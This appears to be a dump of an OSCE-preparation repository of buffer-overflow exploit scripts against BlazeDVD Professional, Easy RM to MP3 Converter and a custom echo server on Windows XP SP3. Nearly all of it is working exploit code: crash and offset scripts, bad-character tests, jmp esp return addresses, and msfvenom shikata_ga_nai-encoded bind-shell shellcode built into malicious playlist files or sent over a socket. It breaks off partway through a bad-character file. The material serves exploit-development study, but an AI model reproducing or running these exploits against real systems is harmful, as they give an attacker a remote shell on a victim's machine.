AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_crash.plf", "wb") 4 | 5 | buffer = "A"*700 6 | 7 | file.write(buffer) 8 | 9 | file.close() -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_b_overwrite.plf: -------------------------------------------------------------------------------- 1 | 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_b_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_eip_b_overwrite.plf", "wb") 4 | 5 | buffer = "A"*260 6 | buffer += "B"*4 7 | buffer += "C"*500 8 | 9 | file.write(buffer) 10 | 11 | file.close() 12 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_badchars.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_badchars.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_eip_badchars.plf", "wb") 4 | 5 | buffer = "A"*260 
6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | buffer += "C"*100 16 | 17 | file.write(buffer) 18 | 19 | file.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_overwrite.plf: -------------------------------------------------------------------------------- 1 | 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_eip_overwrite.plf", "wb") 4 | 5 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A" 6 | 7 | file.write(buffer) 8 | 9 | file.close() 10 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt1.plf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt1.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_shellcode_attempt1.plf", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x1a' -f c 6 | 7 | shellcode = ("\xba\xf7\x60\x07\x67\xda\xcf\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 8 | "\x53\x83\xee\xfc\x31\x56\x0e\x03\xa1\x6e\xe5\x92\xb1\x87\x6b" 9 | "\x5c\x49\x58\x0c\xd4\xac\x69\x0c\x82\xa5\xda\xbc\xc0\xeb\xd6" 10 | "\x37\x84\x1f\x6c\x35\x01\x10\xc5\xf0\x77\x1f\xd6\xa9\x44\x3e" 11 | "\x54\xb0\x98\xe0\x65\x7b\xed\xe1\xa2\x66\x1c\xb3\x7b\xec\xb3" 12 | "\x23\x0f\xb8\x0f\xc8\x43\x2c\x08\x2d\x13\x4f\x39\xe0\x2f\x16" 13 | "\x99\x03\xe3\x22\x90\x1b\xe0\x0f\x6a\x90\xd2\xe4\x6d\x70\x2b" 14 | "\x04\xc1\xbd\x83\xf7\x1b\xfa\x24\xe8\x69\xf2\x56\x95\x69\xc1" 15 | "\x25\x41\xff\xd1\x8e\x02\xa7\x3d\x2e\xc6\x3e\xb6\x3c\xa3\x35" 16 | "\x90\x20\x32\x99\xab\x5d\xbf\x1c\x7b\xd4\xfb\x3a\x5f\xbc\x58" 17 | "\x22\xc6\x18\x0e\x5b\x18\xc3\xef\xf9\x53\xee\xe4\x73\x3e\x67" 18 | "\xc8\xb9\xc0\x77\x46\xc9\xb3\x45\xc9\x61\x5b\xe6\x82\xaf\x9c" 19 | "\x09\xb9\x08\x32\xf4\x42\x69\x1b\x33\x16\x39\x33\x92\x17\xd2" 20 | "\xc3\x1b\xc2\x4f\xcb\xba\xbd\x6d\x36\x7c\x6e\x32\x98\x15\x64" 21 | "\xbd\xc7\x06\x87\x17\x60\xae\x7a\x98\x9f\x73\xf2\x7e\xf5\x9b" 22 | "\x52\x28\x61\x5e\x81\xe1\x16\xa1\xe3\x59\xb0\xea\xe5\x5e\xbf" 23 | "\xea\x23\xc9\x57\x61\x20\xcd\x46\x76\x6d\x65\x1f\xe1\xfb\xe4" 24 | "\x52\x93\xfc\x2c\x04\x30\x6e\xab\xd4\x3f\x93\x64\x83\x68\x65" 25 | 
"\x7d\x41\x85\xdc\xd7\x77\x54\xb8\x10\x33\x83\x79\x9e\xba\x46" 26 | "\xc5\x84\xac\x9e\xc6\x80\x98\x4e\x91\x5e\x76\x29\x4b\x11\x20" 27 | "\xe3\x20\xfb\xa4\x72\x0b\x3c\xb2\x7a\x46\xca\x5a\xca\x3f\x8b" 28 | "\x65\xe3\xd7\x1b\x1e\x19\x48\xe3\xf5\x99\x78\xae\x57\x8b\x10" 29 | "\x77\x02\x89\x7c\x88\xf9\xce\x78\x0b\x0b\xaf\x7e\x13\x7e\xaa" 30 | "\x3b\x93\x93\xc6\x54\x76\x93\x75\x54\x53") 31 | 32 | buffer = "A"*260 33 | buffer += shellcode 34 | buffer += "C"*500 35 | 36 | file.write(buffer) 37 | 38 | file.close() 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt2.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt2.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_shellcode_attempt2.plf", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x1a' -f c 6 | 7 | shellcode = ("\xba\xf7\x60\x07\x67\xda\xcf\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 8 | "\x53\x83\xee\xfc\x31\x56\x0e\x03\xa1\x6e\xe5\x92\xb1\x87\x6b" 9 | "\x5c\x49\x58\x0c\xd4\xac\x69\x0c\x82\xa5\xda\xbc\xc0\xeb\xd6" 10 | "\x37\x84\x1f\x6c\x35\x01\x10\xc5\xf0\x77\x1f\xd6\xa9\x44\x3e" 11 | "\x54\xb0\x98\xe0\x65\x7b\xed\xe1\xa2\x66\x1c\xb3\x7b\xec\xb3" 12 | "\x23\x0f\xb8\x0f\xc8\x43\x2c\x08\x2d\x13\x4f\x39\xe0\x2f\x16" 13 | "\x99\x03\xe3\x22\x90\x1b\xe0\x0f\x6a\x90\xd2\xe4\x6d\x70\x2b" 14 | 
"\x04\xc1\xbd\x83\xf7\x1b\xfa\x24\xe8\x69\xf2\x56\x95\x69\xc1" 15 | "\x25\x41\xff\xd1\x8e\x02\xa7\x3d\x2e\xc6\x3e\xb6\x3c\xa3\x35" 16 | "\x90\x20\x32\x99\xab\x5d\xbf\x1c\x7b\xd4\xfb\x3a\x5f\xbc\x58" 17 | "\x22\xc6\x18\x0e\x5b\x18\xc3\xef\xf9\x53\xee\xe4\x73\x3e\x67" 18 | "\xc8\xb9\xc0\x77\x46\xc9\xb3\x45\xc9\x61\x5b\xe6\x82\xaf\x9c" 19 | "\x09\xb9\x08\x32\xf4\x42\x69\x1b\x33\x16\x39\x33\x92\x17\xd2" 20 | "\xc3\x1b\xc2\x4f\xcb\xba\xbd\x6d\x36\x7c\x6e\x32\x98\x15\x64" 21 | "\xbd\xc7\x06\x87\x17\x60\xae\x7a\x98\x9f\x73\xf2\x7e\xf5\x9b" 22 | "\x52\x28\x61\x5e\x81\xe1\x16\xa1\xe3\x59\xb0\xea\xe5\x5e\xbf" 23 | "\xea\x23\xc9\x57\x61\x20\xcd\x46\x76\x6d\x65\x1f\xe1\xfb\xe4" 24 | "\x52\x93\xfc\x2c\x04\x30\x6e\xab\xd4\x3f\x93\x64\x83\x68\x65" 25 | "\x7d\x41\x85\xdc\xd7\x77\x54\xb8\x10\x33\x83\x79\x9e\xba\x46" 26 | "\xc5\x84\xac\x9e\xc6\x80\x98\x4e\x91\x5e\x76\x29\x4b\x11\x20" 27 | "\xe3\x20\xfb\xa4\x72\x0b\x3c\xb2\x7a\x46\xca\x5a\xca\x3f\x8b" 28 | "\x65\xe3\xd7\x1b\x1e\x19\x48\xe3\xf5\x99\x78\xae\x57\x8b\x10" 29 | "\x77\x02\x89\x7c\x88\xf9\xce\x78\x0b\x0b\xaf\x7e\x13\x7e\xaa" 30 | "\x3b\x93\x93\xc6\x54\x76\x93\x75\x54\x53") 31 | 32 | buffer = "A"*260 33 | buffer += "\x64\xc3\x78\x7e" 34 | buffer += "\x90"*10 35 | buffer += shellcode 36 | buffer += "C"*500 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt3.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt3.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt3.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_shellcode_attempt3.plf", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x1a' -f c 6 | 7 | shellcode = ("\xba\xf7\x60\x07\x67\xda\xcf\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 8 | "\x53\x83\xee\xfc\x31\x56\x0e\x03\xa1\x6e\xe5\x92\xb1\x87\x6b" 9 | "\x5c\x49\x58\x0c\xd4\xac\x69\x0c\x82\xa5\xda\xbc\xc0\xeb\xd6" 10 | "\x37\x84\x1f\x6c\x35\x01\x10\xc5\xf0\x77\x1f\xd6\xa9\x44\x3e" 11 | "\x54\xb0\x98\xe0\x65\x7b\xed\xe1\xa2\x66\x1c\xb3\x7b\xec\xb3" 12 | "\x23\x0f\xb8\x0f\xc8\x43\x2c\x08\x2d\x13\x4f\x39\xe0\x2f\x16" 13 | "\x99\x03\xe3\x22\x90\x1b\xe0\x0f\x6a\x90\xd2\xe4\x6d\x70\x2b" 14 | "\x04\xc1\xbd\x83\xf7\x1b\xfa\x24\xe8\x69\xf2\x56\x95\x69\xc1" 15 | "\x25\x41\xff\xd1\x8e\x02\xa7\x3d\x2e\xc6\x3e\xb6\x3c\xa3\x35" 16 | "\x90\x20\x32\x99\xab\x5d\xbf\x1c\x7b\xd4\xfb\x3a\x5f\xbc\x58" 17 | "\x22\xc6\x18\x0e\x5b\x18\xc3\xef\xf9\x53\xee\xe4\x73\x3e\x67" 18 | "\xc8\xb9\xc0\x77\x46\xc9\xb3\x45\xc9\x61\x5b\xe6\x82\xaf\x9c" 19 | "\x09\xb9\x08\x32\xf4\x42\x69\x1b\x33\x16\x39\x33\x92\x17\xd2" 20 | "\xc3\x1b\xc2\x4f\xcb\xba\xbd\x6d\x36\x7c\x6e\x32\x98\x15\x64" 21 | "\xbd\xc7\x06\x87\x17\x60\xae\x7a\x98\x9f\x73\xf2\x7e\xf5\x9b" 22 | "\x52\x28\x61\x5e\x81\xe1\x16\xa1\xe3\x59\xb0\xea\xe5\x5e\xbf" 23 | "\xea\x23\xc9\x57\x61\x20\xcd\x46\x76\x6d\x65\x1f\xe1\xfb\xe4" 24 | "\x52\x93\xfc\x2c\x04\x30\x6e\xab\xd4\x3f\x93\x64\x83\x68\x65" 25 | "\x7d\x41\x85\xdc\xd7\x77\x54\xb8\x10\x33\x83\x79\x9e\xba\x46" 26 | "\xc5\x84\xac\x9e\xc6\x80\x98\x4e\x91\x5e\x76\x29\x4b\x11\x20" 27 | "\xe3\x20\xfb\xa4\x72\x0b\x3c\xb2\x7a\x46\xca\x5a\xca\x3f\x8b" 28 | "\x65\xe3\xd7\x1b\x1e\x19\x48\xe3\xf5\x99\x78\xae\x57\x8b\x10" 29 | "\x77\x02\x89\x7c\x88\xf9\xce\x78\x0b\x0b\xaf\x7e\x13\x7e\xaa" 30 | "\x3b\x93\x93\xc6\x54\x76\x93\x75\x54\x53") 31 | 32 | buffer = "A"*260 33 | buffer += "\x53\x93\x42\x7e" 34 | 
buffer += "\x90"*60 35 | buffer += shellcode 36 | buffer += "C"*500 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | 5 | my $buffer = "\x41" x $buffsize; # build the exploit buffer 6 | 7 | # write the exploit buffer to file 8 | my $file = "asx2mp3.m3u"; 9 | open(FILE, ">$file"); 10 | print FILE $buffer; 11 | close(FILE); 12 | print "Exploit file created [" . $file . "]\n"; 13 | print "Buffer size: " . length($buffer). "\n"; -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-determine-eip.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | my $As = "\x41" x ($buffsize / 5); 5 | my $Bs = "\x42" x ($buffsize / 5); 6 | my $Cs = "\x43" x ($buffsize / 5); 7 | my $Ds = "\x44" x ($buffsize / 5); 8 | my $Es = "\x45" x ($buffsize / 5); 9 | 10 | my $buffer = $As.$Bs.$Cs.$Ds.$Es; # build the exploit buffer 11 | 12 | # write the exploit buffer to file 13 | my $file = "asx2mp3.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). 
"\n"; 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-overwrite-eip-jmp-esp.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | 5 | my $junk = "\x41" x 35039; # offset to eip overwrite 6 | my $eip = pack('V', 0x01AAF23A); # jmp esp C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll 7 | my $sploit = $junk.$eip; # build the exploit portion of the buffer 8 | my $fill = "\x43" x ($buffsize - length($sploit)); # fill the remainder of the buffer 9 | my $buffer = $sploit.$fill; # build the final buffer 10 | 11 | # write the exploit buffer to file 12 | my $file = "asx2mp3.m3u"; 13 | open(FILE, ">$file"); 14 | print FILE $buffer; 15 | close(FILE); 16 | print "Exploit file created [" . $file . "]\n"; 17 | print "Buffer size: " . length($buffer). "\n"; 18 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-overwrite-eip.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | 5 | my $junk = "\x41" x 35039; # offset to eip overwrite 6 | my $eip = "\x42" x 4; # overwrite eip 7 | my $sploit = $junk.$eip; # build the exploit portion of the buffer 8 | my $fill = "\x43" x ($buffsize - length($sploit)); # fill the remainder of the buffer 9 | my $buffer = $sploit.$fill; # build the final buffer 10 | 11 | # write the exploit buffer to file 12 | my $file = "asx2mp3.m3u"; 13 | open(FILE, ">$file"); 14 | print FILE $buffer; 15 | close(FILE); 16 | print "Exploit file created [" . $file . "]\n"; 17 | print "Buffer size: " . length($buffer). 
"\n"; 18 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server/echo_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*2036 10 | 11 | sock.send(buffer) 12 | 13 | sock.close() 14 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server/echo_server_shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 10 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 11 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 12 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 13 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 14 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 15 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 16 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 17 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 18 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 19 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 20 | "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" 21 | "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" 22 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" 23 | "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" 24 | 
"\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" 25 | "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" 26 | "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" 27 | "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" 28 | "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" 29 | "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" 30 | "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 31 | 32 | 33 | buffer = "\x90"*36 34 | buffer += shellcode 35 | buffer += "\x90"*(1036-36-len(shellcode)) 36 | buffer += "\x50\xf7\x22\x00" 37 | 38 | sock.send(buffer) 39 | 40 | sock.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_3/badchars.txt: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | 